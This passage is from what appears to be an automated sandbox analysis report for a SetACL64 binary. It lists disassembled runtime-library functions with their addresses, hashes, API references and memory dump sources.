                                                  • Opcode Fuzzy Hash: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
                                                  • Instruction Fuzzy Hash: 43114C32618B8582EB209F16E440269B7E1FB88BA4F584230EE8D07769DF7CD565CB04
                                                  Function 00007FF7C1701300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocErrorLast
                                                  • String ID: tss
                                                  • API String ID: 4252645092-1638339373
                                                  • Opcode ID: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
                                                  • Instruction ID: 7f4c57b0544c791ee8745bf7f3f4360cc2b2201d4555660f09e030ccc0f0e845
                                                  • Opcode Fuzzy Hash: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
                                                  • Instruction Fuzzy Hash: B2F0FF31A0864282EB10BF26A88007DE3A0BF5D374FE00531D65E42BE6DFBCE514CB20
                                                  Function 00007FF7C1757E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF7C1757E85
                                                  • TlsSetValue.KERNEL32(?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000), ref: 00007FF7C1757E9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valuetry_get_function
                                                  • String ID: FlsSetValue
                                                  • API String ID: 738293619-3750699315
                                                  • Opcode ID: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
                                                  • Instruction ID: 40cbcc0fdf7d0872d478ab987c7dc95ecd2f3207101116cdd263fb4647b9b80d
                                                  • Opcode Fuzzy Hash: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
                                                  • Instruction Fuzzy Hash: 53E06561B18A4291EB09BF53F4144B8A362AF4C7A0FD88036D90D06756CFBCD894C360